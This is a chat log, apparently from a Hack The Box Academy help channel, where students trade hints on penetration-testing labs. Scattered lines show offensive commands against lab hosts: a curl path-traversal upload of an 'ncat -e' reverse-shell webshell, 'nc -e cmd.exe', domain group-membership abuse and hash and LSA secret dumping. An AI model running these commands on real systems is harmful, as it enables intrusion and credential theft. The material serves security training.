@vital adder , i used stegcracker it went through rockyou for almost 12 hours and didn't find anything
It says the keytab for user svc_workstations
I don't know...I can only see the AES-256 Hash....Is this the way it should work? Can anyone tell me?
yea that tool is slow as hell
stegseek should take a few sec with rockyou (the whole thing) and if you still can't get it then the right password just isn't in rockyou
cool, thanks
@vital adder I tried it.. but most of the tools don't support PNG format
the tool was so fast though, went through rockyou in not less than 30 second
oh shoot i forgot about the png thing and yep that tool is fast
would the hidden information in the PNG be tampered with after being converted to JPG
not sure but i think so also did you try with tool like exiftool or binwalk with the file?
Hey Crean, could I DM you?
@stuck hull yes
Let me try them out
Maybe there are more encrypted files. Look around
I havent done yet the module. Have you checked which version is running? In some other module had to update the version because it gave me error.
you can reset the password manually
The version on my Kali instance didn't work with the provided files so I'm having to use the pwnbox, but I can't seem to scp the zip to it for some reason
you mean send the zip file using scp via ssh? which error does it give you? My problem was more with neo4j (few modules with version 4.2 and had to update to 4.4.x to enter the server and change the default password and connect to it so I could run bloodhound and load the zip file)
Connection refused, no matter what ip I use
It's started, it's listening on 0.0.0.0:22
I added my public key to authorized
damn difficult to help blindly hehe will start the module this weekend. best of luck
guys I am having issues with rdp into windows machines, currently I am studying Active directory attacks & enumeration
When I connect using RDP from my attack box, it disconnects after 3 sec or more, any suggestions?
Module: Firewall and IDS/IPS Evasion - Medium Lab
Prompt: After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer.
I found the flag, but I cannot figure out how it wants it formatted for the answer
HTB984NIFN97CB0783QBNJCPAS984UIN
That is what I got
Try to wrap the {} around
has anyone had issues with getting back the cubes reward? I have finished the LDAP module but didn't get 200 cubes back
Is there a way to copy the flag from the vm incase of typos?
Still cannot get it with: HTB{984NIFN97CB0783QBNJCPAS984UIN}
I've tried every format I can think of. This is the service version correct? I found it where it says: Service Info: Host: HTB984NIFN97CB0783QBNJCPAS984UIN; OS: Linux; CPE: ..........
This is not the answer
The best hint is the one it gives you
I do not need to use nc or anything do I? just nmap?
Attacking Common Services Easy - Trying to get my Webshell but i cant get it to work tried uploading different shells but whenever i curl it or open the link in the browser nothing happens and nothing connects back to my listener
tried this command|| curl -k -X PUT -H "Host: 10.129.80.115" --basic -u fiona:987654321 --data-binary "ncat 10.10.15.91 1234 -e" --path-as-is https://10.129.80.115/../../../../../..\xampp\htdocs\myshell.php||
any hints?
sitting almost 5h on this one lol
Also is the version in the form of a flag? or a number like 2.1.8
nmap / it will be in the form of flag
this hint: ||publicly accessible server|| helped me
Got it. with a NSE script. Thanks!
@polar crag use the database to upload the shell
Hey, is solving boxes by reading a write up a day before doing so a good enough learning path? I can't seem to solve any on my own but I also don't want to be mindlessly copying and pasting as I read and write
Does anyone have the kira password in Credential Hunting in Linux module? I didn't keep her password from the previous ones.
Unless I'm missing something from the hint
@rustic sage that is not a good idea, u need to try first
I had already tried to do so before to no avail
@rustic sage try harder and think out of the box
alright now I could replicate it! Finally free, this took me ages lmao and it was only easy
@rustic sage yes I agree with crean... try it first and if you're stuck look for hints, then try harder, repeat.
If you really don't know how to solve them then get the basics down
check out the modules you're weak at
I know this is the wrong sub but, I'm unsure where to go for an annoying email account association issue with my THM account lol
Wrong server entirely
Could you point me in the direction of said server =]
Check your dms
tyvm
Could someone help me with:
- The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system.
- Module: Metasploit - Sessions - last Question
- I am getting a low priv user shell - and I configured the payload to use 'x64' architecture but when I try the other module payload - the CVE one - It says - exploited but no sessions were created, and the current session is also the low priv user.
- I have read the previous chats and I think @hazy grotto faced the same issue - so if you or anyone else have figured it out, Could you please help me, Thanks
@viscid furnace Look for sudo buffer overflow
1st post here... I'm on Meterpreter module. I have a session as NT Authority\System, i've dumped the hashes and trying to submit the htb-student ntlm hash, it's not taking it as correct. I've converted to all CAPS, submitted as presented, etc... any suggestions?
The Heap overflow right? I have tried but in that only it says no sessions were created
dm me
Be sure to take just the part after the :
dump LSA secrets. youll find what you need there
Just the NT hash, not the lm hash
@ripe badge that's the part i took; however, it's the same for all users
you need the part before the colon
Anyone have a hint for the NoSQL Injection module. I am stuck on the last assessment and can't seem to come up with a payload to return true/false
they aren't stored NT:LM, they're stored LM:NT
Yes, the part after, the NT needs to be submitted
so, i tried just running hashdump, but i had to bg the session, and use the post exploit. I've tried entering all parts of the hash, LOL. got this error with hashdump: priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect. so - i'm about to go to google university
Try to migrate to another process. The hash should start with cf.....
you need to steal a system token and migrate to a system process
yeah, that's what i'm doing now, thanks for the help
np
I have a bit of a noob question, I am doing the Windows Fundamentals module and I need to remote to the windows machine with xfreerdp, I enter the information, I press enter. It tells me if I accept the certification, I click Y.
And after that the machine does not spawn
What am I doing wrong ? 😦
Send a screenshot of the error
I'm also having the same problem with host 3, I have a shell but don't have privilege to type the flag. Does anyone have any hints?
send in whisper as I cannot post SS here
thank you!
Verify your account in #bot-commands
Disregard, found the solution to my problem.
Please ,is it preferable to use a virtual box on a windows machine or simply run Kali linux on a USB?
virtual box
hlo
Google is your friend
The best Uncle is Uncle Google,
For the Footprinting module -> DNS section the final question is What is the FQDN of the host where the last octet ends with "x.x.x.203"? I'm assuming i should || use the subdomain list to discover more subdomains via the bash one liner, but its not returning me a domain with the expected IP address. Is this the right path or should i be down another path? ||
You need to find all zones
guys is it weird i prefer pwnin shit on htb instead of hanging out with my fam?
I am doing the following module; https://academy.hackthebox.com/module/147/section/1320, in the hints there is a username + password but I am not able to login with those creds
you’ve learned about mutating passwords and you were provided a username and wordlist try that😉
Thanks, I will ! @rustic sage
I love this Rule; OneRuleToRuleThemAll.rule
Works for far a lot of times haha
I think they provided a rule list too
for your sanity I’d stick to what’s in the resources sections or you’re going to be waiting a lot longer
ahw sure, thanks!
sounds perfectly normal to me lol, family can be stressful, but not in the "omfg I should be able to get into this!!!!" way HtB is
ha nice just what i needed to hear glad to be among my people haha @frigid monolith
I got the NoSQL Injection module anyways
Woah. Checked out the general chat today. Just about got canceled.
I'm so thankful for the people in here.
Hi, I have a doubt in the module Information Gathering - Web Edition, section Active Subdomain Enumeration, question: Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer. I have managed to perform what I believe were n-number of zone transfers with nslookup (I couldn't with dig, I can't understand how to pass the parameters to make it work). I don't know if I'm understanding the question correctly. Is it asking how many parts (making a simplification, understanding parts (zones) as each containing the respective records of FQDNs and IPs) of this organization can I reach? If anyone can shed light on this I will really appreciate it
Whats the correct section name?
Active Subdomain Enumeration
Whoops i was looking in OSINT
I maybe have guessed the answer. i can't even remember how this even works.
dig axfr inlanefreight.htb @<IP>
lol i am dying at what the guy who wrote documentation and reporting said: "We've tried to make this typically dull topic more engaging than usual, so strap in. It's going to be a wild ride down the rabbit hole of documentation and reporting!"
Lolll
lol
Damn it sucks being dense
hey anyone done the documenting and reporting final lab. could use some help
Hello I'm working on the sessions section of the introduction to metasploit module. I'm on the last question which indicates sudo is outdated, I have attempted to background the session and use local exploit suggester, and other small tasks but to no avail. Can someone give me a hint?
I have the sudo version, just unsure how I should go about escalating my privilege.
I have found the solution, disregard.
hey if you've done the documenting/reporting skill assessment I could use help. The machine keeps resetting after a min or two making it impossible to complete. I have switched VPNs, tried via pwnbox, tried 5 different target IPs, nothing works. I know what to do but can't do it, so if any of y'all could help please DM me
ugh the last question on DNS is killing me; not sure what I'm doing wrong per se in regards to getting the answer any help is appreciated; I did the loop command but now I'm not sure where to really go from that... I feel like it should be obvious but I'm just not seeing it
Footprinting DNS
OH MY GOD
I figured... it was
lol i'm so silly on that one
In the final capstone module, does anyone have issues doing ssh dynamic port forwarding on the initial access machine?
For CPTS
Stuck on Password Attacks Medium, I've got the smb creds, j's ssh/sql creds, d's creds including the crack rsa ...but still at a lost when it comes to priv esc to root @.@ and avoided asking for help up until the "Just drop linPeas " feeling washed over me and i valiantly resisted lol #plshlp
I mean... nothing wrong with using tools; they're there to help.. get the answer easy then work backwards on how the automated script got the results
Currently on "Introduction to Networking" and I'm having a hard time grasping the concept of subnetting.. if anybody could chime in and help a homie out, that would be very much appreciated! Mahalo (thank you) \mn/
what exactly is it that is giving you trouble in understanding :)
the assessments for Attacking Common Applications are pretty brutal compared to super easy mode module sections
I found a semi-unintended way to finish the final part though by reading the docs lmao
Good news: my enumeration skill are on par with linpeas...aside from a few CVE's id'd ...Bad News : the Pea didn't give me anymore info
Finding the network and broadcast address in particular. From my understanding the "/27" is the number of bits changed right?
Unchanged.
The first 27 bits remain the same. Only the remaining are variables.
not necessary changed, but enabled; 27 is 27 1's so 11111111.11111111.11111111.11100000; to break into octets we break at every 8 octet represented
https://kb.wisc.edu/ns/page.php?id=3493 here is a little cheat sheet for /CIDR notation
the 0 numbers represent the available ips that can be assigned on a network :)
it might be asking you to write out the full command to make the directory
you're on the right track
:)
with linux when you mkdir it drops it as whatever you typed
the only time you may need quotes is if you're using spaces
eh having spaces in a directory just means whenever you reference the full filepath you need to have the quote around the entire path
@.@ i got it
if you're going to separate words for directory/filenaming; i suggest using the '_' or '-'
you'll end up hating yourself so trying to help you break the habit, because you may end up fudging up a command because the filepath referenced, needs quotes, and you forgot a quote, also if you have an open ended quote when finishing out a command it goes to the next line waiting for you to close that quote.
sure shoot me a dm if you still need help with that i'll help you troubleshoot
hey can someone help me with something
I am not able to sign up in HTB Academy
it is saying u have to verify email
can someone tell me how to solve this
Log into the email account you typed in to Hack the box academy
And it will send you a link, when u click the link ur account will be verified
Appreciate you for this!
Hey @vital adder you still around? I wanna dm you something bc I'm getting an interesting error but not sure what the cause is, but my basic error is "failed to read user names database"
Nvm I figured it out I think
Error resolved
New issue... But eh
i'm here also which module are you having that issue with?
the footprinting smtp module; I got it to stop yelling at me about the wordlist, but now I'm running into the fact that it's not finding any accounts
i probably could have manually enum faster than this lol
but gahd dangit bobby i wanna be cool
... i swear to god
one second
because I SWEAR
if i have been fighting this... for NO reason
Damn bro that's rough
for the smtp thing I just used metasploit the first time because I couldn't get the tool to work, but someone here found out the issue was it was going too fast 🤣
so try with -w 15 at the end
i've been trying to run every iteration of this stupid command LOL
is the ||domain|| important?
i think yes but i didn't have to use it in for the command in my note
@fathom pendant use evolution to login smtp
my initial thing was that it wasn't taking my db so it was using default which drove me nuts LOL
didn't have it installed before but I'll give it a try after this
sorry for the off topic post just want to put this here to linked it to other people asking about oscp
@vital adder I think in the upgraded oscp bufferoverflow was removed
ok but how? LOL i'm not smart
i got the name
btw
but i'm just like why this hate
@fathom pendant u will need username, password and email to login
sounds like a lot of effort
also did you use the given wordlist?
yes
if the smtp-user-enum tool doesn't work for you try smtp_enum in metasploit
but for the tool the 2 main flags are ||-M VRFY|| for the smtp method and ||-w 15|| for the speed
ye metasploit/msfconsole got my back 
yep that also got me most of the time when other tools don't work
the speed one wasn't necessary though i loaded the actual aux
just had to change directories and stuff
Restarted my computer for the first time since I did the reset let's hope I don't have to do another one LOL
Any pointers on how to find admin email address? (FootPrinting -> IMAP / POP3)
imaps ssl interaction shows ssl cert email address (cto) but that's invalid
tried a few dns enum options on dev subdomain, but no luck
also checked robin's mailbox...no emails there 😦
Hey kinda stuck asking this here due to lacking access to the rest of the server but you're all very helpful so I thought it wouldn't be a big deal
is there any difference between an integer and a buffer overflow
after doing some light reading it seems like integer overflows lead to buffer overflows and are practically the same thing if you don't get into too much detail
Finally cracked it
I have the following error with Evil-winRM, I tried to google. But I am not able to solve this issue. Has anyone an idea?
I have the same error, when I try to use evil-winrm (installed via gem)
I tried to install older versions of evil-winrm.. but that didn't work
i'm not smart enough to help you with the buffer overflow but for accessing the rest of the channel you'll need to verify first use ++verify at #bot-commands
if you are in the pth section of the password attack module then this should work
just for a sanity check try scanning winrm port on that target machine
Yea.. the winrm port is open. I think there is something wrong with my machine
try restarting the target machine, wait a few min for everything to fully boot up
In Attacking Enterprise / Active Directory Compromise, the following command to add ttimmons to the Server Admins group fails and I don't understand why. Any idea?
PS C:\Users\ilfserveradm\Downloads> $group = Convert-NameToSid "Server Admins"
PS C:\Users\ilfserveradm\Downloads> Add-DomainGroupMember -Identity $group -Members 'ttimmons' -Credential $timcreds -verbose
i get this error "Add-DomainGroupMember : Cannot bind argument to parameter 'Identity' because it is an empty string."
Have you checked the content of the $group variable?
Any idea on how to read .zlib binary compressed file ?
yes I've written it: $group = Convert-NameToSid "Server Admins". This is from the course but doesn't seem to work here
But is there actually anything in the variable?
What happens if you only enter $group?
A SID should be output
Otherwise, I can't see anything that could be wrong.
Hi
quick question
in the Mass IDOR Enumeration
section
im adding the ?uid=1 after /documents.php
but im not seeing any results
is that normal?
can i dm someone about a question in the SMB portion of the Footprinting module? Nevermind got it
It's 😉 verify how the requests are being made
thanks
okay still struggling with the Footprint module -> DNS ||I'm curious why the dnsenum script can't find the ns.internal.inlanefreight.htb name server given its there||
Feels like the answer lies somewhere in
||;; ANSWER SECTION:
dev.inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
dev.inlanefreight.htb. 604800 IN NS ns.inlanefreight.htb.||
||and i tried brute forcing that but still never got an entry even with 11mil sub domain wordlist||
Try using the smallest list.
Can someone explain where I'm going wrong in file inclusion module > file prevention question 2. We are supposed to use the php.ini file (there are two) and edit them to block system() commands. But if you cat the path to the php.ini file and use grep system, there is no option for it, so I assume we must enter that whole thing in, but where? And in theory if I try doing a php webshell that uses system() shouldn't it work, because mine hasn't. Any help would be appreciated +UPDATE+ somehow I big boy brained it and figured it out somehow, I would be glad to help anyone struggling with this in the future.
You can sometimes get away with net group "server admins" theusername /add /domain if you're abusing GenericAll or something.
Did anyone have issues getting a reverse shell using julio's hash? Password Attacks - Pass the Hash
I ended up using nc -e cmd.exe instead. The generated powershell code from revshell didn't work.
Looking for some assistance with the Credential Hunting in Linux section. I can log in with kira's password, however I'm having trouble locating Will's password. I've poked around and attempted firefox_decrypt multiple times and used LaZagne with no luck. Can I get a hint in the right direction?
I DM'd you
Hi guys, I wanted to know if you have any material (YouTube or video) of people actually doing EH.
not relevant to the channel
I am doing the following module https://academy.hackthebox.com/module/147/section/1657, and I am at the following question: Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \\DC01\julio. I found the right Kerberos file and I can interact with DC01. I reverted the instance 2 times but julio.txt isn't there. Can I DM someone?
Only flag.txt is present (from the earlier question), there is no julio.txt
@rustic sage Try running the firefox_decrypt script from the module.
Was working through the SSH Dynamic Port Forwarding + SOCKS stuff on Pivoting. How does one get rid of these socket error messages when doing an nmap scan over proxychains?
@trail leaf maybe use 0>&1 at the end
Ok
What does the Capital S mean? I know a lowercase means you can execute something with the permissions of another user. or is this an error in the module?
Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer. (Format: <username>:<password>)
Password Attacks - Password Reuse
Been working on this for 4 hours and can't seem to figure out what to do.
Hello folks, anyone available to get me some help with the RDP and SOCKS Tunneling with SocksOverRDP module -- I did exactly what was instructed but kept getting an error when connecting over RDP with the user jason. is there a workaround on this or a hint to finish the module would be awesome! Thank you.
@placid quest I now see what you meant by using evolution: Thanks for the hint; it was self explanatory once it clicked :D
Hello. Can I get any help with this? My targets are always or almost always dead, and I don't know why.
I appreciate the nudge..
Hey, I apologize if this is the wrong section for this. I'm new to Discord and new to cybersecurity/pentesting; I've been doing a few paths/modules and had a silly question: is the "bash" terminal called "mate" in the workstation? I was stumped on the introduction for a stupid long time; I restarted and had to subscribe to start a new instance, but I planned to anyway.
sometimes you have to be slightly more specific, and sometimes capitalization matters :)
bash is a shell; mate is just a particular terminal emulator that can run various tools, bash and other shells being amongst the more common stuff.
@hazy grotto Check the github repo for default passwords, the link is in the module.
Anyone here done the skills assessment for SQL Injection Fundamentals? Pretty far, but could use some help.
Am I doing this wrong? In password attacks, I'm looking for the julio.txt flag and it's empty?
. D 0 Thu Jul 14 12:25:24 2022
.. D 0 Thu Jul 14 12:25:24 2022
julio.txt A 0 Sun Dec 25 00:50:40 2022
You've cat'd it and looked at it, yeah?
usually the answer is within the module as well
@fathom pendant smbclient //dc01/julio -k -c "more julio.txt"
That's what I ran to read it.
not on that one yet - are you able to actually access the server share to take a look?
@fathom pendant
smb: \SharedFolder> cd julio
smb: \SharedFolder\julio> ls
. D 0 Thu Jul 14 12:25:24 2022
.. D 0 Thu Jul 14 12:25:24 2022
julio.txt A 0 Sun Dec 25 01:03:44 2022
7706623 blocks of size 4096. 4459931 blocks available
if only there was a way to retrieve a file this way ¯\_(ツ)_/¯
It's the same section. Maybe I'm blind, I'm not seeing it. I'll keep looking though.
@hazy grotto https://github.com/ihebski/DefaultCreds-cheat-sheet
@fathom pendant Must be an error in the lab. I can read linux01's flag but not julio's on the same share.
¯\_(ツ)_/¯
@dim hound I think it's an error in the lab
Ticket cache: FILE:/tmp/krb5cc_647401106_XXXXXX
Default principal: julio@INLANEFREIGHT.HTB
Valid starting Expires Service principal
12/25/2022 01:10:02 12/25/2022 11:10:02 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 12/26/2022 01:10:02
12/25/2022 01:10:59 12/25/2022 11:10:02 cifs/dc01@INLANEFREIGHT.HTB
root@linux01:/tmp# smbclient //dc01/julio -k
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 14 12:25:24 2022
.. D 0 Thu Jul 14 12:25:24 2022
julio.txt A 0 Sun Dec 25 01:03:44 2022
7706623 blocks of size 4096. 4459477 blocks available
Anyone ever get this error with hydra before? I'm at a loss for how to fix it.
@graceful rampart try ftp
FTP ain't running on this machine lol
I'm pretty sure it is. Did you run an nmap scan? I used FTP instead of SSH.
I was running into the same errors. It times out too much.
I didn't, because the question said to use SSH. Lemme look.
Network Enumeration with Nmap - Service Enumeration section - the nmap service scan runs fine on all ports, but I am not seeing anything that looks like a flag.
@eternal vale what flags did you use?
nmap -sV -p- 10.129.2.49 -T5
The -T5 does not really need to be there, as that makes it scan aggressively and it may skip over a port if it doesn't respond quickly.
oh ok, let me remove that
ok, didn't realize how deep it went since no scripts have been mentioned thus far
nah a specific script is not needed
I think -sC runs defaults scripts, is that not mentioned yet?
what is the specific question being asked?
I did -A as well and didn't see any flag like but let me try again
also if you just see the version as a text and not the HTB{...} flag you may need to refresh your vpn connection
Just not seeing a flag after running service scans
DM me what you're having issues with and your scans
because if this is the one I think it is then the answer may be simple
Does anyone have good notes or guidance for the skill assessment in file inclusion module?
How long did it take you to find the password for the password mutation exercise? Because it's still going for me 😭
@graceful rampart Took about 30mins for me
The password attacks module is rough
to break you down mentally lol
Not sure what the point is. Maybe to illustrate what a real pentest is like, idk.
I think it's pointless
I agree. I understand not having it be the first password in the list, but making it take 30 minutes is brutal for an exercise.
If I remember, I think you can cut the first 10,000 or something.
Speeds things up a lot.
I recall they didn't even tell you to try another service
SSH took longer, and errored out more.
@graceful rampart Try ncrack if you want to brute force ssh. Hydra didn't really work for me in the lab.
Will do
Apparently it's a known issue that I'm having.
There's an open issue on the GitHub that hasn't been fixed yet.
tip - { sed '1,17000d' mut_password.list > cut_mut_password.list }
Hey guys, I am new to this server.
Thanks. This and using ncrack got it in 30 seconds
Hello, is there anyone to help me?
There is no need to use a VPN to connect for any of the CA challenges; they are all accessible via the public IPs given when started. Not all challenges have an HTTP server, however; some you need to connect to via nc.
I know a couple of months have passed, but this is definitely the definition of think out of the box. It helped a lot. Thank you!
I was able to solve it, enumerate the machine 😁
Someone tell me how to scan when nmap -sX and -Pn scans are blocked.
It helps when you provide a specific module and lesson you're doing so we can guide you better.
Happy holidays fellow nerds
depends on the machine you're scanning and with what VPN
Ensure you're using "starting point VPN" for starting point machines
Or "machines" for normal/retired machines
Can anyone help on the Active directory skill assessment part 1?
Hi, could anyone tell me why sqlmap can't detect JSON data as below:
anyone online
@pastel gale yes
Have you done the Shells live engagement?
No
I have, what's the issue?
Which section and question are you on? And try with the -p flag.
sure shoot me a dm if you still need help
Hi~ The section is Running SQLMap on an HTTP Request
I can inject with --data but can't inject it from a file.
The -p is for selecting the parameter to inject.
Hello everyone, I'm doing CPTS at the moment and came across one exercise under the Public Exploits section. I'm not able to scan the server using either the VPN or Pwnbox. nmap -sV --script=banner <IP> -p <PORT> for service enumeration. The message I get from nmap is "Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-25 07:16 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.35 seconds". Can someone please help me understand why this is happening? I've also switched to different VPNs but get the same result.
Is it possible to intercept radio transmissions?
Yes, but that's not related to HTB, see other platforms.
Make sure you're on the VPN, then if you can't ping the remote host, rebuild your VPN / reset the exercise.
Who can I DM regarding Password Attacks, hard lab?
@pastel ginkgo I already did those but it's still not responding, even from the Pwnbox. Unable to ping it.
Have you also reset the target?
Yes I did
On Password Attacks - Credential Hunting in Windows, I am trying to upload lazagne.exe.
I tried with xfreerdp and I am constantly disconnected or getting this error.
Any ideas or workarounds to upload a file?
smb server ; )
Did you actually try running nmap using -Pn? Also try deleting and re-downloading your VPN key, then restarting it and spawning a new target.
@broken warren yes that's what I've been trying
If you can't ping the target, period, you have other problems before running nmap.
All of the targets on HTB are pingable.
For the love of god, if that's a Docker container, can people stop scanning it, because you can't.
You can't ping / scan an HTB Docker container; you only have access to that IP on the given port.
shoot me a dm if you still need help
It's more like not all of them use a Docker container.
Scanning through a public IP means you are routing traffic through your ISP, and that isn't fun.
└─$ smbclient -U Bob -L 10.129.225.69
Password for [WORKGROUP\Bob]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.225.69 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
I also can't access the admin and C shares.
You need a workaround to upload files. Read the File Transfer section.
Inside there, it's explained how you can utilize an SMB server to upload files.
It says in the section: We can use our RDP client to copy the file over to the target from our attack host. If we are using xfreerdp, all we must do is copy and paste into the RDP session we have established.
hahaha
What I think is there is a problem with the machine or something.
reset the machine 😀
Shittt.. then idk, dude.
Why are they even nmapping it? It's a web app module and it gives you a web app. What are they looking for... 🤯
Yeah, I have 0 clue, but that seems to have happened a bit too much lately.
Anyone got a quick way to put zips onto the Pwnbox? I haven't run into this issue since I usually use a VM, but... yeah...
I don't think I can just copy it in.
If the zip file in your case is a download for a section, you can just copy that link and use wget on the Pwnbox.
Yeah, just thought I could also just log in to HTB on the Pwnbox...
Or if that isn't the case for me, I just do a Python SimpleHTTPServer with ngrok (I use the same thing if I need to move a file from the Pwnbox to my machine).
Sorry to bother again, and I know it's the Python 2 version, but how do I actually do this question? I've reinstalled the John the Ripper stuff from GitHub and it still doesn't want to work.
Has anyone got an answer to how I can get this working?
Oh, for all the 2john tools, don't use the ones on the Pwnbox, because I think most of them are broken in some way.
I'll erratum it. Do I need to VM it?
I'm not 100% sure, but I think I did find a "fix" a while back. Let me see if I can find it, but you should just use your own VM for this or use some online stuff.
Hi guys, I am new to this. I want to learn hacking and my basics are covered, like networking, nmap, Wireshark. I want to learn pentesting, but I am confused about which subscription plan it falls under. Can you help me?
Give both of those videos a check.
https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=lhz0-qAQlBM